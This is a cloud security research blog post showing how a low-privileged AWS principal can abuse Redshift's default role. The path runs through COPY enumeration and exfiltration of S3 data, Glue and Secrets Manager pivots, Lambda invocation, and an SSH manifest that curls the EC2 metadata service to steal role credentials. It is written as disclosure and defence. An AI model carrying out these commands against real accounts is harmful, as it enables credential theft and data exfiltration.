Redshift Security: Attack Surface Explained

Ofir Shaty

In our previous posts (Access and Data Flows, Data Backups and Encryption) we discussed security best practices to implement least-privilege access on Redshift and reduce the static risk associated with your sensitive data.

TL;DR In this post we will show how an attacker can exploit security risks to achieve lateral movement and privilege escalation. This allows the threat actor to leverage weak permissions and reach services and data sources they didn’t have access to initially.

What is an attack vector?

An attack vector is the path an attacker takes along the cyber kill chain in order to accomplish their mission.
The cyber kill chain is a common model that breaks an attack into stages; it helps in understanding attacks and how to prevent them.

IAM role association

IAM role association gives Redshift powerful capabilities: it can copy, unload, query, and analyze data from external sources. Along with those capabilities, the IAM role carries the risk of exposing sensitive data.
We have observed many cases where overly permissive roles are attached to Redshift clusters, exposing sensitive data assets and their content to anyone with basic privileges.

Redshift built-in role

In the “create cluster” page, AWS allows you to create a default role for the Redshift cluster.
The default role carries incredibly powerful permissions via the attached policy “AmazonRedshiftAllCommandsFullAccess”.

“AmazonRedshiftAllCommandsFullAccess” is a powerful policy containing excessive privileges that can lead to privilege escalation and lateral movement, even when the role is created with the “No additional S3 bucket” option.
We will show later what risks can arise from allowing this policy.

Next, we will demonstrate how an attacker who gained access to a very basic principal can use this default policy to perform S3 and Glue operations, invoke Lambdas, access Kinesis, and fetch secrets to connect to RDS, Athena, and Hive Metastore - all starting from little more than the privilege to create a cluster (“redshift:CreateCluster”).

The following flow diagram shows the possible attack paths:

Basic AWS principal:

For the demo we are using a very basic AWS principal with the following policy attached, which allows:
“redshift:CreateCluster”, “redshift:DescribeClusters”, “iam:PassRole”, “ec2:Describe*”

Here is a link to the policy
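As a sketch, a policy granting those permissions might look like the following (the linked policy is authoritative; this is only an illustration):

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "redshift:CreateCluster",
        "redshift:DescribeClusters",
        "iam:PassRole",
        "ec2:Describe*"
      ],
      "Resource": "*"
    }
  ]
}
```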


It is recommended to know exactly which AWS principals have the permissions above, as it can potentially lead to unexpected access to other services.

Attackers that gain access to AWS with the above low-privileged principal can create a Redshift cluster:
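For illustration, creating a cluster with the default role attached might look like this (the cluster identifier, account ID, role ARN, and credentials are all hypothetical):

```shell
aws redshift create-cluster \
    --cluster-identifier attacker-cluster \
    --node-type dc2.large \
    --number-of-nodes 1 \
    --master-username awsuser \
    --master-user-password 'Str0ngPassw0rd1' \
    --iam-roles arn:aws:iam::111122223333:role/service-role/AmazonRedshift-CommandsAccessRole \
    --default-iam-role-arn arn:aws:iam::111122223333:role/service-role/AmazonRedshift-CommandsAccessRole
```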

Performing reconnaissance with the COPY command

The COPY command allows the Redshift cluster to load data from external sources like S3, DynamoDB, EMR, and EC2.
The following flow diagram shows the possible attack path when using the COPY command:

In this section we will focus on S3 buckets. The default role contains the following permissions, which eventually allow an attacker to list, create, delete, and get objects from buckets containing “redshift” in their name:
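A paraphrased sketch of the relevant S3 statement (not the verbatim policy text; check the managed policy in IAM for the authoritative version):

```json
{
  "Effect": "Allow",
  "Action": [
    "s3:ListBucket",
    "s3:GetBucketLocation",
    "s3:GetObject",
    "s3:PutObject",
    "s3:CreateBucket",
    "s3:DeleteObject"
  ],
  "Resource": [
    "arn:aws:s3:::*redshift*",
    "arn:aws:s3:::*redshift*/*"
  ]
}
```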

With access to the newly created Redshift cluster, the attacker needs to traverse all the files in the S3 bucket in order to choose which files to exfiltrate.
The permissions in the default role give the attacker the ability to do so.

By using the COPY command with a <bucket name> instead of a <file name>, an attacker can perform reconnaissance on the bucket and extract a list of all the files in it:

To make Redshift ignore encoding and length errors the attacker can use the ‘TRUNCATECOLUMNS’ and ‘encoding UTF16BE’ properties.
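A sketch of such a reconnaissance COPY (the bucket name and staging table are hypothetical):

```sql
-- A one-column staging table is enough for reconnaissance
CREATE TABLE recon (raw_line VARCHAR(MAX));

-- Point COPY at the bucket root rather than a specific file,
-- and suppress encoding/length errors so the load keeps going
COPY recon
FROM 's3://acme-redshift-data/'
IAM_ROLE default
TRUNCATECOLUMNS
ENCODING UTF16BE;
```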

By querying the “STL_LOAD_COMMITS” table, the attacker can find a list of all the filenames in the bucket:
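A minimal sketch of that query:

```sql
-- Every file Redshift touched during the COPY is recorded here
SELECT DISTINCT filename
FROM stl_load_commits
ORDER BY filename;
```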

Using the COPY command, they can list all the files in that bucket.

If an attacker tries to list all the files in the bucket with their basic AWS principal, rather than from Redshift, they will get an “Access Denied” error:
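For example (bucket name hypothetical):

```shell
aws s3 ls s3://acme-redshift-data/
# fails with an AccessDenied error on the ListObjectsV2 operation
```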

Now that the attacker has the list of files in the bucket it is possible to exfiltrate them one by one with the correct encoding.

Structured data exfiltration with COPY command:

Loading the “employee.csv” file from the S3 bucket above:
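A sketch of that load (the bucket name is hypothetical; the “exfil” table and “employee.csv” file are as in the text):

```sql
CREATE TABLE exfil (raw_line VARCHAR(MAX));

COPY exfil
FROM 's3://acme-redshift-data/employee.csv'
IAM_ROLE default
TRUNCATECOLUMNS;
```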

Once the data is loaded, the attacker can query the ‘exfil’ table to get the data:
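For example:

```sql
SELECT * FROM exfil;
```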

If the attacker tries to download the file with the low-privileged principal, the command fails with an error:

Unstructured data exfiltration with COPY command:

Next, the attacker can also exfiltrate unstructured data like a pdf file.
To do so they can add some properties like ‘ACCEPTINVCHARS’, ‘BLANKSASNULL’, ‘IGNOREBLANKLINES’ to make the COPY command succeed:
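A sketch of such a load (the bucket and file names are hypothetical):

```sql
CREATE TABLE exfil_pdf (raw_line VARCHAR(MAX));

-- The extra properties let COPY tolerate the binary noise in a PDF
COPY exfil_pdf
FROM 's3://acme-redshift-data/contract.pdf'
IAM_ROLE default
ACCEPTINVCHARS
BLANKSASNULL
IGNOREBLANKLINES
TRUNCATECOLUMNS;
```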

The attacker can query the output table to get the data:

To make this output human readable, the attacker can copy the content and save it as a pdf file.


It is possible to detect suspicious usage of the COPY command by constantly monitoring the “STL_LOAD_ERRORS” and “STL_LOAD_COMMITS” tables.
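One possible starting point for such monitoring (a sketch, not a complete detection rule):

```sql
-- Recent load errors: repeated encoding/format failures across many
-- files can indicate reconnaissance rather than a broken pipeline
SELECT starttime, filename, err_reason
FROM stl_load_errors
ORDER BY starttime DESC
LIMIT 50;
```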

Privilege escalation using the CREATE EXTERNAL SCHEMA command:

Using the CREATE EXTERNAL SCHEMA command, which allows querying from external sources, an attacker can escalate privileges and access external data services like Glue, Athena, Kinesis, RDS, and Hive.
The following flow diagram shows the possible attack paths:

To understand how it is possible, let's look at some of the privileges of the default role:

ListSecrets & GetSecretValue allow users in Redshift to connect to remote sources like RDS, Athena, and Hive Metastore.
The Redshift cluster gets the secret from Secrets Manager and opens a connection to the external service.
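For example, once a usable secret is found, a federated schema to an RDS MySQL instance can be created along these lines (the endpoint, database name, and secret ARN are hypothetical):

```sql
CREATE EXTERNAL SCHEMA rds_mysql
FROM MYSQL
DATABASE 'employees'
URI 'target-db.abc123xyz.us-east-1.rds.amazonaws.com'
IAM_ROLE default
SECRET_ARN 'arn:aws:secretsmanager:us-east-1:111122223333:secret:redshift-rds-creds-AbCdEf';

-- Query the remote database through Redshift
SELECT * FROM rds_mysql.salaries LIMIT 10;
```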

Redshift’s default role has interesting permissions for Glue as well.
Glue has many usages, especially as an ETL pipeline that moves data between multiple sources (S3, Kinesis, or Kafka).
The permissions in the default policy:
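Paraphrased, the Glue statement looks roughly like this (see the managed policy for the authoritative list of actions):

```json
{
  "Effect": "Allow",
  "Action": [
    "glue:CreateDatabase",
    "glue:DeleteDatabase",
    "glue:GetDatabase",
    "glue:CreateTable",
    "glue:DeleteTable",
    "glue:GetTable",
    "glue:GetTables",
    "glue:GetPartitions"
  ],
  "Resource": "*"
}
```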

This means that the Redshift cluster has permission to create and drop databases, get or delete tables in Glue, and more.

The default role only allows actions on S3 buckets containing “redshift” in their name, but since Glue is not restricted by that policy, an attacker can leverage the Glue service to bypass the name restriction and reach S3 buckets that don’t contain the string “redshift” in their name.

The following flow diagram shows the possible attack paths:

In this case, the Glue database “attack-redshift” contains a table “lake” that maps to an S3 bucket called “ofir-data-lake”:

Attackers can access Glue objects from Redshift with the following command:
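A sketch of that command (the database and table names are as in the example above; the schema name and region are hypothetical):

```sql
CREATE EXTERNAL SCHEMA glue_attack
FROM DATA CATALOG
DATABASE 'attack-redshift'
IAM_ROLE default
REGION 'us-east-1';

-- Read the S3-backed Glue table through Redshift Spectrum
SELECT * FROM glue_attack.lake LIMIT 10;
```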

At this point, the attacker managed to access the S3 bucket files which were not accessible before!

If the attacker tries to access the same file directly with the COPY command, it fails with an error:

Invoking Lambda functions with CREATE EXTERNAL FUNCTION

Redshift's default role also has permission to invoke any Lambda function containing the string “redshift” in its name:
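Paraphrased, that permission looks roughly like this (check the managed policy for the authoritative text):

```json
{
  "Effect": "Allow",
  "Action": "lambda:InvokeFunction",
  "Resource": "arn:aws:lambda:*:*:function:*redshift*"
}
```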

The following flow diagram shows the possible attack paths:

If an attacker tries to invoke the Lambda function “lateral_movement_with_redshift_lambda” with the low-privileged AWS principal, it results in a permission denied error:

If the attacker tries to do the same from within Redshift:
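A sketch of that step (the wrapper function name and signature are hypothetical; the Lambda name is as in the text):

```sql
-- Register the target Lambda as a Redshift UDF
CREATE EXTERNAL FUNCTION invoke_target (VARCHAR)
RETURNS VARCHAR
STABLE
LAMBDA 'lateral_movement_with_redshift_lambda'
IAM_ROLE default;

-- Invoking the UDF invokes the Lambda with Redshift's role
SELECT invoke_target('ping');
```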

The lambda will be invoked successfully:

Extracting temporary credentials from EC2:

A smart attacker will follow this path further and try to extend their foothold.
Using the COPY command, an attacker can execute commands over SSH on an EC2 instance, which in turn allows them to extract the credentials attached to that instance.


For this technique to work, a few prerequisites must be met:

  • The EC2 instance should have an IAM role attached
  • The instance’s authorized_keys file should contain the Redshift cluster’s public key
  • The instance should use the IMDS
  • A manifest file should be uploaded to a location in S3

To extract EC2 credentials, an attacker can take advantage of the Instance Metadata Service (IMDS).
By querying the IMDS it is possible to retrieve the temporary credentials attached to the instance along with other metadata information.
To do so, the attacker can execute the following command on the EC2 instance:
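In its simplest (IMDSv1) form, this is a single metadata request:

```shell
# Returns the name of the IAM role attached to the instance
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
```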

The attacker can upload the following manifest file with the above command to S3:
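A sketch of such an SSH manifest (the endpoint and username are hypothetical; optional fields like the public key are omitted):

```json
{
  "entries": [
    {
      "endpoint": "ec2-203-0-113-10.compute-1.amazonaws.com",
      "command": "curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/",
      "mandatory": true,
      "username": "ec2-user"
    }
  ]
}
```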

Then execute it from Redshift and load the information into the “listing” table:
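A sketch of that step (the manifest location is hypothetical; the “listing” table is as in the text):

```sql
CREATE TABLE listing (raw_line VARCHAR(MAX));

-- The SSH keyword tells COPY to treat the S3 object as an SSH manifest
COPY listing
FROM 's3://acme-redshift-data/ssh_manifest.json'
IAM_ROLE default
SSH;
```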

To view the output of the command, the attacker can query the table they created:

Now the attacker needs to modify the manifest command to contain the role name returned in the previous step and execute it one more time to get the credentials.
Also, since the credentials can be long, it is necessary to encode the output in base64:
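The modified manifest command might then look like this (the role name is a placeholder for the value returned in the previous step):

```shell
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name> | base64 -w 0
```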

Attackers that execute the command will get the FULL credentials encoded in base64:

The attacker can decode the result back to a readable text and extract the credentials:


We saw some powerful attack vectors in which an attacker can leverage the ‘redshift:CreateCluster’ permission to escalate privileges, move laterally, and eventually access different resources and exfiltrate sensitive data.

Along with the powerful features that Redshift provides, it is important to make sure that we follow the principle of least privilege, and keep in mind that attackers may use legitimate actions in their quest.

Therefore, it is important to constantly monitor the logs for suspicious activity.

Be safe and Secure, Dig :-)

About the Authors

Ofir Shaty is a Senior Security Researcher at Dig Security. A member of the Security Research team, Ofir has over 6 years of experience in Data Security and Web Application Security. When away from work on sunny days Ofir likes to hit the road with his motorcycle.
Ofir Balassiano is leading the security research team at Dig Security.
Ofir has over 8 years of experience in security research specifically in cloud security as well as low-level OS internals research.
